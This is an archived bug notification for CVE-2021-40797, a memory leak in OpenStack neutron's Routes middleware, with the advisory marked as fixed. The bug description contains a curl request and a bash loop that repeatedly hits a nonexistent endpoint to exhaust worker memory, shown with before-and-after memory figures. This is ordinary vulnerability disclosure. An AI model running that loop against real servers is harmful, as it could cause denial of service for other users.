← Back to team overview

yahoo-eng-team team mailing list archive

[Bug 1942179] Re: Routes middleware memory leak for nonexistent controllers (CVE-2021-40797)

 

Reviewed:  https://review.opendev.org/c/openstack/ossa/+/807942
Committed: https://opendev.org/openstack/ossa/commit/4f5d81b664a81ad7ba4856fbabe1d3f1f12a14e8
Submitter: "Zuul (22348)"
Branch:    master

commit 4f5d81b664a81ad7ba4856fbabe1d3f1f12a14e8
Author: Jeremy Stanley <fungi@xxxxxxxxxxx>
Date:   Wed Sep 8 20:15:03 2021 +0000

    Add OSSA-2021-006 (CVE-2021-40797)
    
    Change-Id: Ie61b5ffbec78e8c90e5ad773c9479f0d7ae1b932
    Closes-Bug: #1942179


** Changed in: ossa
       Status: In Progress => Fix Released

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-40797

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to neutron.
https://bugs.launchpad.net/bugs/1942179

Title:
  Routes middleware memory leak for nonexistent controllers
  (CVE-2021-40797)

Status in neutron:
  Fix Released
Status in OpenStack Security Advisory:
  Fix Released

Bug description:
  Authorized cloud user may do API requests to neutron to not existing
  endpoints, like e.g.:

  curl -g -i -X GET http://10.120.0.30:9696/v2.0/blabla -H "Accept:
  application/json" -H "User-Agent: openstacksdk/0.59.0
  keystoneauth1/4.3.1 python-requests/2.26.0 CPython/3.6.8" -H "X-Auth-
  Token: $token"

  and each such request will increase memory consumption of the neutron-
  api worker process.

  What I did was:

  * start neutron server with just one api worker (easier to calculate
  memory consumption but it would be the same leak in case of more
  workers too). Memory consumption was:

  sudo pmap 212436 | tail -n 1
   total           183736K

  * now run command like:

  $ i=1; while [ $i -lt 2000 ]; do echo "Request $i"; curl -g -i -X GET
  http://10.120.0.30:9696/v2.0/blabla -H "Accept: application/json" -H
  "User-Agent: openstacksdk/0.59.0 keystoneauth1/4.3.1 python-
  requests/2.26.0 CPython/3.6.8" -H "X-Auth-Token: $token" 2>1
  >/dev/null; i=$(( i+1 )); sleep 0.01; done

  * check memory consumption of the same api worker now:

  sudo pmap 212436 | tail -n 1
   total           457896K

To manage notifications about this bug go to:
https://bugs.launchpad.net/neutron/+bug/1942179/+subscriptions